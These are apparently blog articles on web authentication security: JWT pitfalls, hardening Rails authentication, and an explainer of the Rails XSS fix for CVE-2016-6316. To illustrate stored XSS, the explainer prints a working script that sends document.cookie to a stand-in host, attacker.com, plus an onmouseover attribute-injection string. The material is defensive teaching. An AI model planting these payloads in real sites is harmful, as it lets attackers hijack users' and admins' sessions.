5 Mistakes Web Developers Should Avoid When Using JWTs for Authentication

This list is for you if:

  • You care about keeping your users safe and wonder what the best practices for web app authentication are.
  • You’re using or going to use JWTs (JSON Web Tokens) to perform authentication in your application.

When it comes to security, a “working” system unfortunately does not guarantee your users’ safety. This can be true regardless of the “thing” you’re using to build your authentication system, JWTs or otherwise.

JWTs have received and continue to receive a lot of positive and negative attention over the last few years. The pro-JWT camp touts benefits like statelessness, portability, a convenient interface and so on. The anti-JWT camp says JWT is a kitchen sink of crypto formats and maximizes the number of things that can go wrong.


In this post, I’ll take a pragmatic approach and attempt to draw up a list of mistakes that can be made when using JWTs for authentication, while trying my best not to make any value judgements. Think of this as a checklist to go through as you’re building authentication. Note that some items in this list apply regardless of whether you’re using JWTs, while others are JWT-specific.

Note: To keep this article short, the scenarios I’m going to focus on all involve a front-end (run on a browser), user-facing application communicating with one or more servers to perform authentication.

Not having a strategy for session invalidation or revocation

In this scenario, you have a front-end application which makes authentication requests to a server by sending it a username and password. The server verifies this username/password combination, generates a JWT and sends it back to the client. The client is then able to make further requests using the JWT, and the server verifies these requests by validating the signature on the JWT, and saves a database call that it would have otherwise had to make.

There is a problem with this approach, however. A JWT is valid as long as:

  1. It hasn’t expired yet, and
  2. It has a valid cryptographic signature

If you’re ever in a situation where you want to reject requests made with a valid JWT, you’ll need to have a strategy and corresponding infrastructure/app behaviour in place. A common scenario often cited is when a malicious account with a valid JWT needs to be blocked from making any further requests to your servers.

There are a few options at your disposal if you decide this is something to be addressed: a short expiry period combined with a longer-lived “refresh” token, a “deny list” maintained in an external store, rotating the signing key, and potentially others. Every option comes with its own set of trade-offs, so do take the time to research them and understand what you’re giving up and what you’re gaining.
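
To make the “deny list” option concrete, here’s a minimal in-memory sketch in Ruby. It is illustrative only: a real deployment would back this with a shared store such as Redis so every server process sees revocations, keyed off the token’s standard “jti” (unique ID) claim.

```ruby
require 'set'

# Minimal deny list, keyed by the token's unique ID ("jti" claim).
# In-memory for illustration; use a shared store like Redis in production.
class TokenDenyList
  def initialize
    @revoked = Set.new
  end

  def revoke(jti)
    @revoked << jti
  end

  def revoked?(jti)
    @revoked.include?(jti)
  end
end

deny_list = TokenDenyList.new
deny_list.revoke('token-123')

# After verifying a JWT's signature and expiry, also consult the deny
# list before treating the request as authenticated.
```

Note that the trade-off is visible even in this sketch: every request now incurs a lookup, which is exactly the kind of state the stateless-JWT approach was trying to avoid.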

Putting sensitive data in the JWT

A typical JWT is a long, seemingly random string made up of three dot-separated segments: a header, a payload and a signature.

Though this looks illegible, the header and payload are actually very readable: they are plain-text JSON objects encoded using base64. For every piece of information you decide to put in your JWT, ask yourself: how much damage would it cause if this got into the wrong hands?
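
To see just how readable a JWT is, here’s a small Ruby sketch that builds a JWT-shaped string from made-up claims and then reads the payload back without any key (all values here are hypothetical):

```ruby
require 'base64'
require 'json'

# A JWT is header.payload.signature, each segment base64url-encoded.
header  = Base64.urlsafe_encode64(JSON.generate(alg: 'HS256', typ: 'JWT'), padding: false)
payload = Base64.urlsafe_encode64(JSON.generate(user_id: 42, admin: false), padding: false)
token   = "#{header}.#{payload}.fake-signature"

# Anyone holding the token can decode the claims -- no secret required.
claims = JSON.parse(Base64.urlsafe_decode64(token.split('.')[1]))
puts claims['user_id'] # => 42
```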

Two common remediations for having sensitive data in the JWT are:

  1. Stop putting sensitive data in there.
  2. If you really need to have sensitive data, encrypt your JWT.

Needless to say, there are trade-offs with both approaches, which necessitates thinking carefully about what your requirements are. For example, with option 1, you might have to change your application architecture and perhaps incur a lookup cost. Option 2, on the other hand, adds the complexity of having to encrypt something and of deciding where and how it will be decrypted.

Not guarding against CSRF (cross-site request forgery)

In this scenario, your front-end app stores the JWT in a cookie (with no protections on it) and your server authenticates requests by parsing the cookie and running a JWT validation check on it. If a user has your app open in one browser tab and happens upon a malicious website in another, that website can make authenticated requests to your app, because the browser will automatically include any cookies associated with your app’s domain. This is known as cross-site request forgery (CSRF), and you’ll want to guard against it. A common solution is for your server to include a CSRF token in its responses and require that any requests made to it contain a matching token; a malicious script has no way of knowing what this token is, so its requests get blocked.
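
The synchronizer-token idea can be sketched in a few lines of plain Ruby (names are illustrative; this is a sketch, not a production implementation):

```ruby
require 'securerandom'

# On session creation, the server generates an unguessable token and
# keeps it associated with the session.
session = { csrf_token: SecureRandom.base64(32) }

# The app embeds the token in its own forms. A cross-site attacker can
# trigger requests but cannot read this token, so forged requests fail.
def valid_csrf?(session, submitted_token)
  # Use a constant-time comparison in production.
  !submitted_token.nil? && submitted_token == session[:csrf_token]
end

token_from_own_form = session[:csrf_token]
```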

If you’re using a framework like Rails or Express, chances are high that the framework includes options you can use to protect your users against CSRF, using one or more well-known mitigation techniques.

Related: You’ll also want to set the httpOnly and secure flags on your cookies. httpOnly prevents malicious scripts from accessing and potentially exfiltrating the contents of your JWT (in the context of an XSS attack) and secure ensures that cookies will not be sent across the wire unless the https protocol is being used.

Storing the JWT in local storage

Since cookies typically have a 4KB size limit, you might reason that a JWT that contains more information could be stored in local storage instead.

Local storage is not protected against XSS

If you have an XSS vulnerability, a malicious script could easily exfiltrate the contents of local storage to anywhere it chooses, allowing the attacker to impersonate the user at their convenience. A common counterpoint to this argument is that in the event of an XSS attack against an app that stores its JWT in a cookie, an attacker would still be able to make authenticated requests, since httpOnly and secure do nothing to prevent this. This is true, but the cookie approach is arguably more secure because it limits the attacker to carrying out attacks only while the user is actively using the app, or has it open in a tab somewhere.

I’d bias towards choosing the more secure option in this case (and also do my best not to introduce XSS vulnerabilities!).

Choosing an asymmetric signing algorithm without a good reason

I’m not a security expert, so take this point with a grain of salt. From the research I’ve done so far, RSA (the most commonly used algorithm to asymmetrically sign JWTs) is hard to get right and can have subtle implementation bugs. Cryptographers with far more knowledge than I have recommended against it.

Unless you have a really good reason for choosing asymmetric (public-key) signing, choose HS256 (HMAC-SHA256) as your algorithm. If you’re building a system where a third party needs to be able to validate a signature but not be able to generate one (the typical reason web apps reach for asymmetric signing), consider an API where the third party can ask the secret holder whether a given signature is valid.
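
As an illustration of what HS256-style signing involves, here’s a minimal sign-and-verify sketch in plain Ruby. The secret and claims are made up, and in a real application you’d reach for a vetted library (e.g. the ruby-jwt gem) rather than rolling your own:

```ruby
require 'openssl'
require 'base64'
require 'json'

SECRET = 'a-long-random-secret'.freeze # illustrative; load from secure config

def b64(data)
  Base64.urlsafe_encode64(data, padding: false)
end

def sign(claims)
  header    = b64(JSON.generate(alg: 'HS256', typ: 'JWT'))
  payload   = b64(JSON.generate(claims))
  signature = b64(OpenSSL::HMAC.digest(OpenSSL::Digest.new('SHA256'), SECRET, "#{header}.#{payload}"))
  "#{header}.#{payload}.#{signature}"
end

# Constant-time comparison, so verification doesn't leak signature bytes
# through timing differences.
def secure_equals?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).sum { |x, y| x ^ y }.zero?
end

def valid?(token)
  header, payload, signature = token.split('.')
  expected = b64(OpenSSL::HMAC.digest(OpenSSL::Digest.new('SHA256'), SECRET, "#{header}.#{payload}"))
  secure_equals?(expected, signature)
end

token = sign(user_id: 42)
```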

Also, don’t allow “none” as one of the accepted algorithms 🙂

To learn more about how these algorithms work and how they can be exploited, I highly recommend the cryptopals challenges!

Happy learning and building! As always, let me know what you think in the comments below. If you liked what you read, make sure to drop your email in the form below and I’ll send you new articles when I write them.

Recommended Reading

I highly recommend giving these a read to further understand what could go wrong when using JWTs, so you’re best prepared to understand the trade-offs and design/build a secure system.

4 Ways to Secure Your Authentication System in Rails

Authentication frameworks in Ruby on Rails can be somewhat of a contentious topic. Take Devise, one of the more popular options, for example. Critics of Devise point out, perhaps rightly so, that there is a lack of clear documentation, that it is hard to understand, hard to customize and wonder if we wouldn’t be better off using a different gem or even rolling our own custom authentication system. Advocates of Devise, on the other hand, point out that Devise is the result of years of expert hard work and that by rolling your own, you’d forego much of the security that comes with using a highly audited piece of software. If you’re new to this conversation, you might ask yourself why you would even need Devise if, like in the Hartl Rails tutorial or the RailsCast on implementing an authentication system from scratch, you can just use has_secure_password and expire your password reset tokens (generated with SecureRandom) within a short enough time-period.

Is there something inherently insecure in the authentication systems described in the Hartl tutorial and the RailsCasts? Should a gem like Devise be used whenever your app needs to authenticate its users? Does using a gem like Devise mean that your authentication is now forever secure?

Like in most areas of software, the answer is that it depends. Authentication does not exist in isolation from the rest of your app and infrastructure. This can mean that even if your authentication system is reasonably secure, weaknesses in other areas of your app can lead to your users being compromised. Conversely, you might be able to get away with less than optimum security in your authentication system if the rest of your app and infrastructure pick up the slack.

The only way you, an app developer, can answer these questions satisfactorily is to deepen your understanding of security and authentication in general. This will help you as you make the tradeoffs that will inevitably arise when you are building and/or securing your app.

Whether you want to use Devise (or a similar third party gem like Clearance) or roll your own auth, here are 4 specific ways you can make authentication in your app more secure. Though your mileage may vary, I hope at the very least one of them gives you something to think about.

Throttle Requests

The easiest thing an attacker can do to compromise your users is to guess their login credentials with a script. Users won’t always choose good passwords, so given enough time, an attacker’s script will likely be able to compromise a significant number of your users just by making a large number of guesses based on password lists.

You can make it hard for attackers to do this by restricting the type and number of requests that can be made to your app within a predefined time period. The gem rack-attack, for example, is a Rack middleware that gives you a convenient DSL with which you can block and throttle requests.

Let’s say you just implemented the Hartl tutorial and now want to add some throttling. You might do something like this after installing rack-attack:

throttle('req/ip', :limit => 300, :period => 5.minutes) do |req|
  req.ip
end

The above piece of code tells Rack::Attack to limit any given IP to at most 300 total requests every 5 minute period. You’ll notice that since the block above receives a request object, we can technically throttle requests based on any arbitrary request parameter.

While this limits a single IP from making too many requests, attackers can get around this by using multiple IP’s to bruteforce a user’s account. To slow this type of attack down, you might consider throttling requests per account. For example:

throttle("logins/email", :limit => 5, :period => 20.seconds) do |req|
  if req.path == '/login' && req.post?
    req.params['email'].presence # this will return the email if present, and nil otherwise
  end
end

If you’re using Devise, you also have the option to “lock” accounts after too many unsuccessful attempts to log in, and you can also implement a lockout feature by hand. However, there is a flip side to locking and/or throttling on a per-account basis: attackers can now lock arbitrary users out of their accounts on purpose, which is a form of “Denial of Service” attack. There is no easy answer here. When it comes to choosing security mechanisms for your app, you’ll have to decide how much and what type of risk you’re willing to take on; old StackExchange discussions of account-lockout trade-offs are a good starting point for further research.

A note about Rack::Attack and DDoS attacks: Before actually implementing a throttle, you’ll want to use Rack::Attack's “track” feature to get a better idea of what traffic looks like to your web server. This will help you make a more informed decision about throttling parameters. Aaron Suggs, the creator of Rack::Attack, says it is a complement to other server-level security measures like iptables, nginx limit_conn_zone and others.

DoS and DDoS attacks are vast topics in their own right so I’d encourage you to dig deeper if you’re interested. I’d also recommend looking into setting up a service like Cloudflare to help mitigate DDoS attacks.

Set up your security headers correctly

Even though you probably serve requests over HTTPS, you might be vulnerable to a particular type of man-in-the-middle attack known as SSL stripping. To illustrate, imagine you lived in Canada and banked with the Bank of Montreal. One day, you decide to email money to someone and type “bmo.com” into the address bar in Chrome. If you had dev tools open on the “Network” tab, you’d notice that the first request to bmo.com is made via http, not https. A suitably situated attacker could have intercepted this request and served you a spoofed version of the BMO website (getting you to divulge login information and what not), and they’d have been able to do this only because your browser used http instead of https.

The Strict-Transport-Security header (aka the HTTP Strict Transport Security or HSTS header) is meant to prevent this type of attack. By including it in a response, a server tells the browser to only communicate with it via https. The HSTS header usually specifies a max-age parameter, and the browser treats the value of this parameter as how long it should insist on https when talking to the server. So if max-age is set to 31536000 seconds, which is one year, the browser will only communicate with the server via https for a year. The HSTS header also lets your server specify whether the browser should use https on its subdomains as well.
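
For reference, a typical HSTS response header requesting one year of HTTPS-only communication, including subdomains, looks like this:

```
Strict-Transport-Security: max-age=31536000; includeSubDomains
```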

To make this happen in Rails, set config.force_ssl = true. This ensures the HSTS header is sent with a max-age of 180 days. To apply https to all your subdomains as well, you can set config.ssl_options = { hsts: { subdomains: true } }.

The loophole in this is that the first ever request to the server might still be made via http. The HSTS header protects all requests except the first one. There is a way to have the browser always use https for your site, even before the user has actually visited, and that is by submitting your domain to be included in the Chromium preload list. The “disadvantage” with the preload approach is that you will never ever be able to serve info via http on your domain.

Having HSTS enabled doesn’t mean your users will be absolutely safe, but I’d wager they’d be considerably safer with it than without.

If you’re curious, you can quickly check what security related headers (of which HSTS is one) your server responds with on securityheaders.io. I advise looking into all the headers here to learn and decide if they apply to your situation or not.

Read authentication libraries (Devise, Authlogic, Clearance, Rodauth and anything else you have access to)

This especially applies if you’re rolling your own, but even if you don’t you can learn a lot from how another gem does a similar thing. You don’t always have to read the source code itself to learn. The change logs and update blog posts from maintainers can be just as informative, because they often go into detail about vulnerabilities that were discovered and the steps taken to mitigate them. Here are three things I learned from Rodauth and Devise that you might find intriguing:

Restricted Password Hash Access (Rodauth)

Unlike Devise and most “roll your own auth” examples, Rodauth uses a completely separate table to store password hashes, and this table is not accessible to the rest of the application. Rodauth does this by setting up two database accounts, app and ph. Password hashes are stored in a table that only ph has access to, and app is given access to a database function that uses ph to check if a password hash matches a given account. This way, even if an SQL injection vulnerability exists in your app, an attacker will not be able to directly access your users’ password hashes.

User Specific Tokens (Rodauth)

Rodauth not only stores password reset and other sensitive tokens in separate tables, it also prepends every token with an account ID. Imagine your forgot password link looked something like ‘www.example.com/reset_password?reset_password_token=abcd1234’ and an attacker was trying to guess a valid token. The attacker’s guess could potentially be a valid token for any user. If we prepend the token with an account ID (maybe the token looks like reset_password_token=<account_id>-abcd1234), then the attacker can only attempt to brute force their way in to one user account at a time.
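
Here’s what that idea might look like in plain Ruby (the token format here is illustrative, not Rodauth’s actual implementation):

```ruby
require 'securerandom'

# Prepend the account ID so a brute-forced guess can only ever target
# one account's token at a time.
def generate_reset_token(account_id)
  "#{account_id}-#{SecureRandom.urlsafe_base64(24)}"
end

def parse_reset_token(token)
  account_id, secret = token.split('-', 2) # limit 2: the secret may contain '-'
  [Integer(account_id), secret]
end

token = generate_reset_token(42)
account_id, secret = parse_reset_token(token)
```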

Digesting Tokens (Devise)

Since version 3.1, Devise digests password reset, confirmation and unlock tokens before storing them in the database. It does so by first generating a token with SecureRandom and then digesting it with the OpenSSL::HMAC.hexdigest method. In addition to protecting the tokens from being read if an attacker gains access to the database, digesting tokens in this manner also protects them against timing attacks, since it would be near impossible for an attacker to control the string being compared enough to make byte-by-byte changes.
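
The scheme can be sketched like this (the key name and digest construction are illustrative; Devise derives its key from the application secret):

```ruby
require 'securerandom'
require 'openssl'

KEY = 'token-digest-key'.freeze # illustrative; derive from your app's secret

def digest_for(raw_token)
  OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('SHA256'), KEY, raw_token)
end

# Generate a raw token to email to the user, but store only its digest.
raw_token     = SecureRandom.urlsafe_base64(20)
stored_digest = digest_for(raw_token)

# When a token comes back, digest it and look the digest up; the database
# never holds anything directly usable by an attacker who reads it.
```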

If you want to know more about Rodauth, check out their github page and also watch this talk by Jeremy Evans, its creator.

To summarize, the more you know about how other popular authentication frameworks approach authentication and the steps they take to avoid being vulnerable to attack, the more confident you can be in assessing the security of your own authentication set up.

Secure the Rest of Your App

Authentication does not stand in isolation. Vulnerabilities in the rest of your app have the potential to bypass any security measures you might have built into your authentication system.

Let’s consider a Rails app with a Cross Site Scripting (XSS) vulnerability to illustrate. Imagine the XSS vulnerability exists because there’s an html_safe in the codebase somewhere that unfortunately takes in a user input. Because our app is a Rails (4+) app, we have the httpOnly flag set on our cookie by default, which means any Javascript an attacker is able to inject won’t have access to document.cookie. Though it might seem like our app is safe from session hijacking attacks, our attacker can still do a bunch of things to compromise a user’s session. For example, they can inject Javascript that makes an AJAX request to change the user’s password. If the password change form requires the current password, they can try to change the user’s email (to their own) and initiate a password reset flow.

In short, an XSS vulnerability sort of makes it irrelevant how secure your authentication is, and the same can be said of other vulnerabilities like Path Traversal or CSRF.

Learning about security vulnerabilities and then applying that knowledge to attack your own app is a great way to, over the long term, write more secure code. I’d also encourage you to read through resources like the Rails Security Guide and publicly available Rails security checklists.


Shameless Plug: If you’re within a few hours flight from Toronto, I’d love to come talk to you and your team about security, free of charge. Get in touch with me at sidk(AT)ducktypelabs(DOT)com for more info.

The above list is not meant to be comprehensive, and what I’ve left out could probably fill multiple books. However, I hope I’ve given you a few things to think about and that you’re able to take away at least one thing that will make your app more secure.

I’d love to hear from you! Post in the comments section below – what do you do to secure your auth?

Do I really need to patch my Rails apps? (Understanding CVE-2016-6316)

Ruby and Rails security advisories, without exception, recommend that you upgrade your Rails app as soon as possible. Unfortunately, the descriptions of the problem being solved can be cryptic, and it can be hard to assess if you really need to do the upgrade. If you’re strapped for time, it can seem like a good plan to postpone upgrades and avoid extra work like fixing breaking tests.

Note: By “upgrade” in this article, we mean a ‘minor’ or a ‘patch’ upgrade, for example an upgrade from one Rails patch version to the next.

In this article, we’re going to look at the Rails release that fixes CVE-2016-6316. The aims of this article are:

  1. To go over the basics of XSS vulnerabilities, how they can be exploited, and ways to mitigate them.
  2. To increase your understanding of the specific problem solved by the Rails release that fixes CVE-2016-6316 (an XSS vulnerability in ActionView), and
  3. To help you come to a conclusion on whether you should upgrade or not.

What is an XSS Vulnerability?

“XSS” stands for cross-site scripting. When your application has an XSS vulnerability, attackers can run malicious Javascript on your users’ browsers. For example, consider a Javascript snippet like the following:

var i = new Image;
i.src = "http://attacker.com/" + document.cookie;

The above snippet, when run on a user’s browser, will cause the browser to make a request to attacker.com and send over the user’s cookie. Using this cookie, the attacker can proceed to hijack the user’s session and gain unauthorized access to secured areas of your app.

Types of XSS Vulnerabilities

There are three major varieties of XSS:

Reflected XSS

A reflected XSS vulnerability arises when user input contained in a request is immediately reflected in the web application’s response. Exploiting a reflected XSS vulnerability involves crafting a request containing embedded Javascript that is reflected to any user who makes the request.

Stored XSS

A Stored XSS vulnerability arises when data submitted by one user (the attacker) is stored in the application and is then displayed to other users without being sanitized properly.

DOM-based XSS

DOM-based XSS vulnerabilities arise when client-side Javascript extracts data contained in a request’s URL or the response’s HTML (accessible via the DOM) to dynamically update the page’s contents. Exploiting a DOM-based XSS vulnerability involves crafting a request URL containing embedded Javascript such that the client-side Javascript injects the malicious Javascript into the DOM and causes its execution.

See OWASP’s XSS documentation for more info on the three types of XSS.

For the purposes of this article, we will focus on Stored XSS.

How to attack a Stored XSS Vulnerability?

Let’s consider an example to illustrate how such a vulnerability can arise and how an attacker can take advantage of it.

A Vulnerable Rails app

Consider a typical Rails app, with users and admins. A user record has three fields – name, email and introduction. Each user has a profile page where this information is listed. Admins in the system, in addition to being able to access these profile pages, also have access to a /users page which consolidates all the users’ information. The view code for this page starts out looking something like this:

<% #This is accessible only to admins %>
<% User.all.each do |user| %>
  <%= user.name %>
  <%= user.email %>
  <%= user.introduction %>
<% end %>

Now let’s say we want to give our users the ability to customize their introductions with HTML. So instead of typing in "I'm awesome!!" in the introduction field, they can type in "I'm <strong>awesome!!</strong>". To accomplish this in our view, we make use of the html_safe helper and change user.introduction to user.introduction.html_safe. Now, if a user submits text with HTML in it, our view will render the HTML.

Enter Attacker

An attacker can take advantage of this HTML rendering and submit something like this in the introduction field:

I am awesome!!
<script>
  var i = new Image;
  i.src = "http://attacker.com/" + document.cookie;
</script>

and have this stored in the database. Now, whenever an admin logs in and visits the /users page, the above script will run and the attacker will see the admin’s cookie in their server logs. Using this cookie, they can proceed to log in as the admin and further their agenda (malicious though it may be).

Another way to introduce XSS vulnerabilities with html_safe

The above example illustrates one straightforward way by which an XSS vulnerability can be introduced with html_safe. That is, using html_safe directly on user inputs because we want to give users the ability to customize how their input renders.

Another way using html_safe can cause XSS vulnerabilities to sneak up on you is when you find yourself needing to incorporate styling on strings which are derived from user input. Going back to our example Rails app’s /users page, let’s say we’ve installed Font Awesome and we want to provide admins a nicely styled link to a given user’s profile page. We might do something like this in our view:

<% User.all.each do |user| %>
  <%= link_to "<i class='fa fa-user'></i> #{user.name}".html_safe, users_profile_path(user) %>
  <%= user.email %>
  <%= user.introduction %>
<% end %>

As in the previous example, this opens our admin’s account up to XSS attacks. By submitting javascript in the name field, an attacker can proceed to gain access to the admin’s account.

But I need to use html_safe. How can I protect my app?

The key is to use html_safe only on trusted strings, because it is an assertion. You can concatenate a string which is html_safe with a string which is not and be assured that the string which is not html_safe will be escaped properly. So for example, we can do:

<%= link_to "<i class='fa fa-user'></i> ".html_safe + "#{user.name}", users_profile_path(user) %>

which will ensure that user.name is properly escaped. So if we pass in a string like "Bob Foo<script>alert(document.cookie)</script>" as the name, our HTML will look something like:

<a href='...'><i class='fa fa-user'></i> Bob Foo&lt;script&gt;alert(document.cookie)&lt;/script&gt;</a>

instead of:

<a href='...'><i class='fa fa-user'></i> Bob Foo <script>alert(document.cookie)</script></a>

which will prevent the Javascript from running.

The sanitize helper is another useful option. With sanitize, you can specify exactly what HTML tags and attributes you want to render and have it automatically reject anything else.
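
For example, to allow only simple formatting in user introductions, you might write something like this in the view (a sketch using Rails’ sanitize helper; the allow-list here is illustrative):

```erb
<%# Renders <strong> and <em> from user input and strips everything %>
<%# else, including <script> tags and event-handler attributes. %>
<%= sanitize user.introduction, tags: %w[strong em], attributes: [] %>
```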

Rails Views have XSS Protections

Rails (from version 3 onwards) will, by default, escape any content in your views unless you mark it as html_safe (either directly by calling html_safe on a string or indirectly with sanitize). ActionView helpers like content_tag and link_to will also, by default, escape strings that are passed in to them.


As it turns out, inserting <script> tags into places where they won’t be escaped is just one of the many ways to exploit an XSS vulnerability. You (or an attacker) can also take advantage of the fact that Javascript can be called directly via HTML attributes such as onclick, onmouseover and others.

Let’s take a brief look at content_tag to examine how this can work in practice. Rails provides the content_tag helper to programmatically generate HTML tags. For example, to generate a div tag, you’d do something like this:

content_tag(:div, "hi")

which in HTML would translate to:

<div>hi</div>
You can pass in additional parameters to content_tag to specify tag attributes. So if we wanted to add a title attribute, we could say something like:

content_tag(:div, "hi", title: "greeting")

which in HTML would translate to:

<div title="greeting">hi</div>

Now, let’s say for some reason, our app has this title attribute tied to a user input. Meaning, if our user input is foo, the HTML generated by content_tag would be:

<div title="foo">hi</div>

Assuming that there is no XSS protection enabled on content_tag, how would we exploit this?

We could send in a string like " onmouseover="alert(document.cookie), which would result in HTML like the following:

<div title="" onmouseover="alert(document.cookie)">

The key character in our example input is the first double-quote character ". This double-quote, because it is not escaped, is treated by the browser as a closing quote and makes it so that the characters after the double-quote are treated as valid HTML.

Rails, by default, will escape double-quotes, even in helpers like content_tag. Where CVE-2016-6316 comes in though, is when we mark our inputs to helpers like content_tag as html_safe.

Let’s say we’re passing in user input from our controller to the view with the @user_input instance variable, and our call to content_tag looks like:

<%= content_tag(:div, 'hi', title: @user_input) %>

If an attacker tries to pass in a string like "onmouseover=..., Rails will automatically escape the double quotes and prevent the XSS attack.

However, prior to the patched Rails release, if for some reason we marked the user input as html_safe:

<%= content_tag(:div, 'hi', title: @user_input.html_safe) %>

then this would allow double-quotes to be rendered in the HTML without being escaped, which, as we’ve seen, allows an attacker to execute arbitrary Javascript.

The Rails patch ensures that even if you mark an attribute in a tag helper as html_safe, double quotes will be escaped.

So, should I upgrade?

The easy and correct answer is yes, you should upgrade. Especially if the upgrades involve security patches. Even if the upgrades don’t involve security patches, you should upgrade so that future security patches are easier to apply.

That being said, I think it depends on how far away your version of Rails is from the most recently released patch. The closer you are, the easier the upgrade process will be. Security patches in general are designed not to cause breaking changes in your codebase, but that applies only if you’re at the most recent patch already.

If you’re strapped for time, it would behoove you to understand the problems that security advisories and related patches fix, so you can assess for yourself if your codebase is at risk and apply any mitigations necessary.


The most important thing you can do is to keep yourself aware of security advisories as and when they are released, and patch your app ASAP. Here’s how you can accomplish that:

Use bundler-audit. This somewhat automates the process of keeping an eye on security mailing lists, but the onus is on you to regularly run this gem and keep it updated (with bundle-audit update). If you use CI, a good step would be to integrate running bundle-audit as part of your CI process.

When bundler-audit flags a gem as being out of date, upgrade the gem, either with bundle update <gem-name> or, if you have to, by manually changing the version in Gemfile.lock.

If you have the time, look into the security advisory that you just patched and use that as an excuse to learn more about that particular class of vulnerabilities.

Have you patched your Rails app recently? If so, how did that process go for you? What would you like to learn about security in Rails? Let me know in the comments below!

Shout-out: Thanks to Chris Drane for suggesting this article, and to Gabriel Williams at Cloud City for reviewing it!